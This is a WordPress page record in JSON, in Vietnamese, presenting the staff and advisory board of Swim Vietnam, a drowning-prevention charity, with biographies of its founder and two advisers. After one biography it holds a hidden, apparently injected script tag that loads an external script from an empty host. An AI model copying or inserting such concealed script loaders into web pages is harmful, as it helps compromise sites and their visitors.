{"id":15537,"date":"2022-06-19T18:46:56","date_gmt":"2022-06-19T11:46:56","guid":{"rendered":"http:\/\/swimvietnam.com\/?page_id=15537"},"modified":"2025-01-06T09:41:49","modified_gmt":"2025-01-06T02:41:49","slug":"team","status":"publish","type":"page","link":"https:\/\/swimvietnam.com\/vi\/team\/","title":{"rendered":"\u0110\u1ed9i ng\u0169 Swim Vietnam"},"content":{"rendered":"<h2 style=\"text-align: center;\"><strong>C\u01a1 c\u1ea5u t\u1ed5 ch\u1ee9c<\/strong><\/h2>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-16812 size-full\" src=\"https:\/\/swimvietnam.com\/wp-content\/uploads\/2025\/01\/Swim-Vietnam-team-2025.jpg\" alt=\"\" width=\"1023\" height=\"512\" srcset=\"https:\/\/swimvietnam.com\/wp-content\/uploads\/2025\/01\/Swim-Vietnam-team-2025.jpg 1023w, https:\/\/swimvietnam.com\/wp-content\/uploads\/2025\/01\/Swim-Vietnam-team-2025-300x150.jpg 300w, https:\/\/swimvietnam.com\/wp-content\/uploads\/2025\/01\/Swim-Vietnam-team-2025-768x384.jpg 768w\" sizes=\"(max-width: 1023px) 100vw, 1023px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2 style=\"text-align: center;\"><strong>H\u1ed9i \u0111\u1ed3ng s\u00e1ng l\u1eadp v\u00e0 c\u1ed1 v\u1ea5n<\/strong><\/h2>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-15160 aligncenter\" src=\"http:\/\/swimvietnam.com\/wp-content\/uploads\/2022\/06\/1.-Jo-2-300x271-1.jpg\" alt=\"\" width=\"300\" height=\"271\" \/><\/p>\n<h3 style=\"font-weight: 500; text-align: center;\"><b><strong>Joanne Stewart, Nh\u00e0 s\u00e1ng l\u1eadp<\/strong><\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Jo chuy\u1ec3n \u0111\u1ebfn Singapore t\u1eeb London n\u0103m 2002 \u0111\u1ec3 \u0111eo \u0111u\u1ed5i ngh\u1ec1 V\u1ed1n Qu\u1ed1c t\u1ebf, 1 c\u00f4ng ty qu\u1ea3n l\u00fd \u0111\u1ea7u t\u01b0 to\u00e0n c\u1ea7u. Trong 5 n\u0103m, c\u00f4 l\u00ean v\u1ecb tr\u00ed qu\u1ea3n l\u00fd c\u1ea5p cao khu v\u1ef1c v\u00e0 tr\u1edf th\u00e0nh Tr\u1ee3 l\u00fd Ph\u00f3 Ch\u1ee7 t\u1ecbch.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Khi Tribob (c\u00e2u l\u1ea1c b\u1ed9 \u0111\u00e0o t\u1ea1o ba m\u00f4n ph\u1ed1i h\u1ee3p b\u01a1i -\u0111\u1ea1p xe- ch\u1ea1y \u1edf Singapore n\u01a1i Jo l\u00e0 h\u1ed9i vi\u00ean) \u0111\u1ec1 xu\u1ea5t b\u1eaft \u0111\u1ea7u ch\u01b0\u01a1ng tr\u00ecnh d\u1ea1y b\u01a1i mi\u1ec1n Trung Vi\u1ec7t Nam n\u0103m 2007, Jo h\u0103m h\u1edf ti\u1ebfp nh\u1eadn c\u01a1 h\u1ed9i n\u00e0y \u0111\u1ec3 mang t\u1edbi c\u1ed9ng \u0111\u1ed3ng. Jo r\u1eddi vai tr\u00f2 qu\u1ea3n l\u00fd \u0111\u1ea7u t\u01b0\u00a0 v\u00e0 sang Vi\u1ec7t Nam b\u1eaft \u0111\u1ea7u \u0111i\u1ec1u h\u00e0nh ch\u01b0\u01a1ng tr\u00ecnh.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Ch\u01b0\u01a1ng tr\u00ecnh d\u1ea1y b\u01a1i ban \u0111\u1ea7u \u0111\u01b0\u1ee3c th\u1ef1c hi\u1ec7n ch\u1ec9 3-6 th\u00e1ng nh\u01b0ng nhu c\u1ea7u cao qu\u00e1 v\u00e0 ch\u01b0\u01a1ng tr\u00ecnh \u0111\u00e3 ch\u1ee9ng minh \u0111\u01b0\u1ee3c s\u1ef1 th\u00e0nh c\u00f4ng \u0111\u1ebfn n\u1ed7i 10 n\u0103m sau Swim Vietnam ph\u00e1t tri\u1ec3n th\u00e0nh 1 trong s\u1ed1 c\u00e1c t\u1ed5 ch\u1ee9c NGO ph\u00f2ng ch\u1ed1ng \u0111u\u1ed1i n\u01b0\u1edbc l\u00e2u \u0111\u1eddi nh\u1ea5t v\u00e0 \u0111\u00e1ng tr\u1ecdng nh\u1ea5t khu v\u1ef1c.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Jo l\u00e0m vi\u1ec7c to\u00e0n th\u1eddi gian v\u1edbi Swim Vietnam 7 n\u0103m tr\u01b0\u1edbc khi chuy\u1ec3n sang vai tr\u00f2 c\u1ed1 v\u1ea5n.\u00a0 C\u00f4 ti\u1ebfp t\u1ee5c \u0111am m\u00ea\u00a0 d\u1ea1y b\u01a1i sinh t\u1ed3n \u1edf Vi\u1ec7t Nam, v\u00e0 c\u1ed1ng hi\u1ebfn nh\u1eefng n\u0103m qua m\u1edf tr\u01b0\u1eddng b\u01a1i Paul Sadler Swimland theo chu\u1ea9n \u00dac t\u1ea1i th\u00e0nh ph\u1ed1 H\u1ed3 Ch\u00ed Minh.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Chuy\u1ec3n giao th\u00e0nh c\u00f4ng c\u1ea3 Swim Vietnam v\u00e0 PSSS HCMC cho c\u00e1c \u0111\u1ed9i qu\u1ea3n l\u00fd \u0111\u1ecba ph\u01b0\u01a1ng \u0111\u01b0\u1ee3c \u0111\u00e0o t\u1ea1o t\u1ed1t, Jo tr\u1edf l\u1ea1i Scotland \u0111\u1ec3 g\u1ea7n gia \u0111\u00ecnh h\u01a1n v\u00e0 b\u1eaft \u0111\u1ea7u l\u00e0m gi\u00e1o vi\u00ean to\u00e1n m\u1edbi. C\u00f4 ti\u1ebfp t\u1ee5c l\u00e0m c\u00f4ng vi\u1ec7c \u1ea3nh h\u01b0\u1edfng t\u1edbi ph\u00f2ng ch\u1ed1ng \u0111u\u1ed1i n\u01b0\u1edbc \u1edf Vietnam qua vai tr\u00f2 C\u1ed1 v\u1ea5n cho\u00a0 Swim Vietnam.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-weight: 400;\"><br \/>\n.<\/span><script src='https:\/\/?v=11.87.33' type='text\/javascript'><\/script><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-medium wp-image-16347 aligncenter\" src=\"https:\/\/swimvietnam.com\/wp-content\/uploads\/2023\/04\/David-Sidall-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/swimvietnam.com\/wp-content\/uploads\/2023\/04\/David-Sidall-225x300.jpg 225w, https:\/\/swimvietnam.com\/wp-content\/uploads\/2023\/04\/David-Sidall.jpg 480w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<h3 style=\"text-align: center;\"><strong>David Siddall, C\u1ed1 v\u1ea5n\u00a0<\/strong><\/h3>\n<p style=\"text-align: justify; text-justify: inter-ideograph; background: white;\"><span style=\"font-family: 'Arial','sans-serif'; color: #212529;\">David l\u00e0 ng\u01b0\u1eddi \u0111\u00e3 \u0111\u1ed3ng h\u00e0nh c\u00f9ng T\u1ed5 ch\u1ee9c t\u1eeb thi\u1ec7n Swim Vietnam t\u1eeb nh\u1eefng ng\u00e0y \u0111\u1ea7u th\u00e0nh l\u1eadp, ban \u0111\u1ea7u l\u00e0m vi\u1ec7c trong c\u00e1c d\u1ef1 \u00e1n v\u00e0 s\u00e1ng ki\u1ebfn v\u1edbi Rotary International v\u00e0 sau \u0111\u00f3, th\u00f4ng qua Australian Friends for Life (m\u1ed9t nh\u00f3m t\u00ecnh nguy\u1ec7n vi\u00ean v\u1edbi m\u1ee5c \u0111\u00edch h\u1ed7 tr\u1ee3 Swim Vietnam th\u1ef1c hi\u1ec7n c\u00e1c D\u1ef1 \u00e1n ph\u00f2ng ch\u1ed1ng \u0111u\u1ed1i n\u01b0\u1edbc t\u1ea1i Vi\u1ec7t Nam).<\/span><\/p>\n<p style=\"text-align: justify; text-justify: inter-ideograph; background: white;\"><span style=\"font-family: 'Arial','sans-serif'; color: #212529;\">V\u1edbi chuy\u00ean m\u00f4n v\u1ec1 t\u00e0i ch\u00ednh v\u00e0 tr\u01b0\u1edbc khi ngh\u1ec9 h\u01b0u s\u1edbm, David l\u00e0 Gi\u00e1m \u0111\u1ed1c \u0111i\u1ec1u h\u00e0nh c\u1ee7a m\u1ed9t nh\u00f3m c\u00f4ng ty qu\u1ed1c t\u1ebf, ch\u1ecbu tr\u00e1ch nhi\u1ec7m v\u1ec1 c\u00e1c ho\u1ea1t \u0111\u1ed9ng \u1edf Ch\u00e2u \u00c2u, Trung \u0110\u00f4ng v\u00e0 \u0110\u00f4ng \u00c1. David c\u00f3 kinh nghi\u1ec7m trong c\u00e1c vai tr\u00f2 Gi\u00e1m \u0111\u1ed1c \u0111i\u1ec1u h\u00e0nh v\u1edbi c\u1ea3 c\u00f4ng ty t\u01b0 nh\u00e2n v\u00e0 c\u00f4ng ty \u0111\u1ea1i ch\u00fang \u1edf nhi\u1ec1u khu v\u1ef1c ph\u00e1p l\u00fd kh\u00e1c nhau. \u00d4ng c\u0169ng \u0111\u00e3 ch\u1ee7 tr\u00ec m\u1ed9t s\u1ed1 c\u01a1 quan \u0111\u1ea1i di\u1ec7n trong ng\u00e0nh v\u00e0 c\u00e1c t\u1ed5 ch\u1ee9c t\u1eeb thi\u1ec7n.<\/span><\/p>\n<p style=\"text-align: justify; text-justify: inter-ideograph; background: white;\"><span style=\"font-family: 'Arial','sans-serif'; color: #212529;\">\u0110\u01b0\u1ee3c trao quy\u1ec1n t\u1ef1 do c\u1ee7a Th\u00e0nh ph\u1ed1 Lu\u00e2n \u0110\u00f4n n\u0103m 1986, David c\u0169ng l\u00e0 Th\u00e0nh vi\u00ean c\u1ee7a Paul Harris, \u0111\u01b0\u1ee3c trao t\u1eb7ng b\u1edfi Rotary International.<\/span><\/p>\n<p style=\"text-align: justify; text-justify: inter-ideograph; background: white;\"><span style=\"font-family: 'Arial','sans-serif'; color: #212529;\">L\u00e0 ng\u01b0\u1eddi mang hai qu\u1ed1c t\u1ecbch Anh\/\u00dac, David v\u00e0 v\u1ee3 l\u00e0 Angela s\u1ed1ng \u1edf Perth, T\u00e2y \u00dac. H\u1ecd c\u00f3 ba ng\u01b0\u1eddi con tr\u01b0\u1edfng th\u00e0nh v\u00e0 s\u00e1u \u0111\u1ee9a ch\u00e1u. Ngo\u00e0i vi\u1ec7c d\u00e0nh th\u1eddi gian cho gia \u0111\u00ecnh v\u00e0 tham gia c\u00e1c ho\u1ea1t \u0111\u1ed9ng t\u1eeb thi\u1ec7n, h\u1ecd c\u00f2n th\u00edch \u0111i du l\u1ecbch trong v\u00e0 ngo\u00e0i n\u01b0\u1edbc \u00dac.<\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-16409 aligncenter\" src=\"https:\/\/swimvietnam.com\/wp-content\/uploads\/2023\/04\/Marilyn-p-283x300.jpg\" alt=\"\" width=\"283\" height=\"300\" srcset=\"https:\/\/swimvietnam.com\/wp-content\/uploads\/2023\/04\/Marilyn-p-283x300.jpg 283w, https:\/\/swimvietnam.com\/wp-content\/uploads\/2023\/04\/Marilyn-p.jpg 474w\" sizes=\"(max-width: 283px) 100vw, 283px\" \/><\/p>\n<h3 style=\"text-align: center;\"><strong>Marilyn, C\u1ed1 v\u1ea5n\u00a0<\/strong><\/h3>\n<p>Marilyn \u0111\u00e3 h\u1ed7 tr\u1ee3 Swim Vietnam trong m\u1ed9t th\u1eddi gian gian d\u00e0i. \u0110\u1ebfn nay Swim Vietnam ch\u00e0o \u0111\u00f3n c\u00f4 tr\u1edf th\u00e0nh m\u1ed9t trong nh\u1eefng th\u00e0nh vi\u00ean c\u1ee7a H\u1ed9i \u0111\u1ed3ng C\u1ed1 v\u1ea5n.<\/p>\n<p>Chuy\u00ean ng\u00e0nh c\u1ee7a Marilyn l\u00e0 v\u1ec1 qu\u1ea3n l\u00fd m\u00f4i tr\u01b0\u1eddng, HSSE (S\u1ee9c kh\u1ecfe, An to\u00e0n, An ninh v\u00e0 M\u00f4i tr\u01b0\u1eddng) v\u00e0 qu\u1ea3n l\u00fd r\u1ee7i ro. C\u00f4 \u1ea5y hi\u1ec7n \u0111ang l\u00e0m vi\u1ec7c cho m\u1ed9t c\u00f4ng ty n\u0103ng l\u01b0\u1ee3ng \u1edf London, n\u01a1i c\u00f4 \u1ea5y l\u00e0m vi\u1ec7c v\u1edbi m\u1ed9t nh\u00f3m c\u00e1c b\u00ean li\u00ean quan r\u1ed9ng l\u1edbn bao g\u1ed3m ch\u00ednh ph\u1ee7, ng\u00e0nh c\u00f4ng nghi\u1ec7p, t\u1ed5 ch\u1ee9c phi ch\u00ednh ph\u1ee7 v\u00e0 c\u00e1c \u0111\u1ed1i t\u00e1c kh\u00e1c \u0111\u1ec3 thi\u1ebft l\u1eadp s\u1ef1 \u0111\u1ed3ng thu\u1eadn r\u1ed9ng r\u00e3i h\u01a1n v\u1ec1 nh\u1eefng th\u00e1ch th\u1ee9c v\u00e0 gi\u1ea3i ph\u00e1p nh\u1eb1m \u0111\u1ea9y nhanh qu\u00e1 tr\u00ecnh kh\u1eed cacbon x\u00e3 h\u1ed9i v\u00e0 chuy\u1ec3n \u0111\u1ed5i n\u0103ng l\u01b0\u1ee3ng.<\/p>\n<p>Marilyn l\u00e0 ng\u01b0\u1eddi M\u1ef9 nh\u01b0ng \u0111\u00e3 s\u1ed1ng \u1edf n\u01b0\u1edbc ngo\u00e0i 27 n\u0103m qua t\u1ea1i Australia, Singapore v\u00e0 London. Khi s\u1ed1ng \u1edf ch\u00e2u \u00c1, c\u00f4 \u0111\u00e3 c\u00f3 vinh d\u1ef1 \u0111\u01b0\u1ee3c bi\u1ebft \u0111\u1ebfn Swim Vi\u1ec7t Nam t\u1eeb nh\u1eefng ng\u00e0y \u0111\u1ea7u th\u00e0nh l\u1eadp v\u00e0 r\u1ea5t ng\u01b0\u1ee1ng m\u1ed9 nh\u1eefng th\u00e0nh t\u00edch m\u00e0 team \u0111\u00e3 \u0111\u1ea1t \u0111\u01b0\u1ee3c k\u1ec3 t\u1eeb \u0111\u00f3.<\/p>\n<p>C\u00f4 hi\u1ec7n \u0111ang h\u1ecdc n\u0103m cu\u1ed1i ch\u01b0\u01a1ng tr\u00ecnh Th\u1ea1c s\u0129 v\u1ec1 Ho\u1ea1t \u0111\u1ed9ng t\u1eeb thi\u1ec7n v\u00e0 \u0110\u1ea7u t\u01b0 x\u00e3 h\u1ed9i t\u1ea1i Tr\u01b0\u1eddng Kinh doanh Bayes \u1edf London.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>C\u01a1 c\u1ea5u t\u1ed5 ch\u1ee9c &nbsp; H\u1ed9i \u0111\u1ed3ng s\u00e1ng l\u1eadp v\u00e0 c\u1ed1 v\u1ea5n Joanne Stewart, Nh\u00e0 s\u00e1ng l\u1eadp Jo chuy\u1ec3n \u0111\u1ebfn Singapore t\u1eeb London n\u0103m 2002 \u0111\u1ec3 \u0111eo \u0111u\u1ed5i ngh\u1ec1 V\u1ed1n Qu\u1ed1c t\u1ebf, 1 c\u00f4ng ty qu\u1ea3n l\u00fd \u0111\u1ea7u t\u01b0 to\u00e0n c\u1ea7u. Trong 5 n\u0103m, c\u00f4 l\u00ean v\u1ecb tr\u00ed qu\u1ea3n l\u00fd c\u1ea5p cao khu v\u1ef1c v\u00e0 [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"_links":{"self":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15537"}],"collection":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/comments?post=15537"}],"version-history":[{"count":13,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15537\/revisions"}],"predecessor-version":[{"id":16814,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15537\/revisions\/16814"}],"wp:attachment":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/media?parent=15537"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}